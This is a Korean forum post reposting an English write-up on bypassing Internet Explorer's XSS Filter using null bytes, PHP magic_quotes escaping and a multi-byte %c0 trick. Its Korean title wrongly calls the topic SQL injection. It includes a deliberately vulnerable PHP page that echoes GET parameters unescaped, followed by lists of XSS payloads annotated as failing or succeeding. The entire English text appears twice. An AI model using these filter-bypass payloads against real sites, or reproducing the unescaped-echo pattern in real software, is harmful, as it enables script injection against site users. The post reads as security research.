널포인트 이용한 sql인젝션
페이지 정보
본문
Author/Sogili(@jackmasa)
Post/Insight-labs.org
Basically some special characters in the web container to do the conversion process,if developers mistake concept in the process,it might be bypass IE XSS Filter.
In PHP, if website enable magic_quote_gpc = On in php.ini , as we known ‘(single-quote), “ (double quote), (backslash) and NULL characters are backslash as an escape (%00 => 0).
For my pentesting of the bypass IE Xss Filter, I feel the IE developers are don’t interest in IE Xss Filter against NULL characters are backslash ( ) escape character, I mean they aren’t depthly understanding of the conversion process.
1. xss.php demo source code:
12345 <?php echo $_GET['x']?> <script type=\"text/javascript\"> var x=\"<?php echo $_GET['z']?>\" </script>
2. HTML bypass case:
<script>alert(1)</script> :(
<script/%00%00%00%00%00>alert(1)</script>
%00%00v%00%00<script>alert(1)</script> :(
<script/%00%00v%00%00>alert(1)</script> :D
tips:
1.bypass the characters must be appears in intercept rules of IE Xss Filter , for example: intercept <script> also can be <script [here]>.
3. Javascript bypass case:
“;alert(1)//
%c0″;alert(%00)// :)
%c0″;//(%0dalert(1)// :(
%c0″;//(%0dalert(1)// :(
%c0″;//(%00%0dalert(1)//
%c0″//(%000000%0dalert(1)//
tips:
1.Need through multi-byte problem close a backslash ( )
2. //(%000000%0d is used to bypass the function intercept rules.
Feel free to contact me with @jackmasa
Post/Insight-labs.org
Basically some special characters in the web container to do the conversion process,if developers mistake concept in the process,it might be bypass IE XSS Filter.
In PHP, if website enable magic_quote_gpc = On in php.ini , as we known ‘(single-quote), “ (double quote), (backslash) and NULL characters are backslash as an escape (%00 => 0).
For my pentesting of the bypass IE Xss Filter, I feel the IE developers are don’t interest in IE Xss Filter against NULL characters are backslash ( ) escape character, I mean they aren’t depthly understanding of the conversion process.
1. xss.php demo source code:
12345 <?php echo $_GET['x']?> <script type=\"text/javascript\"> var x=\"<?php echo $_GET['z']?>\" </script>
2. HTML bypass case:
<script>alert(1)</script> :(
<script/%00%00%00%00%00>alert(1)</script>
%00%00v%00%00<script>alert(1)</script> :(
<script/%00%00v%00%00>alert(1)</script> :D
tips:
1.bypass the characters must be appears in intercept rules of IE Xss Filter , for example: intercept <script> also can be <script [here]>.
3. Javascript bypass case:
“;alert(1)//
%c0″;alert(%00)// :)
%c0″;//(%0dalert(1)// :(
%c0″;//(%0dalert(1)// :(
%c0″;//(%00%0dalert(1)//
%c0″//(%000000%0dalert(1)//
tips:
1.Need through multi-byte problem close a backslash ( )
2. //(%000000%0d is used to bypass the function intercept rules.
Feel free to contact me with @jackmasa
관련링크
-
http://insight-labs.org/?p=499
4835회 연결
- 이전글실명인증 시 오류 해결(아이핀) 20.02.21
- 다음글php 소켓통신 20.02.21
댓글목록
등록된 댓글이 없습니다.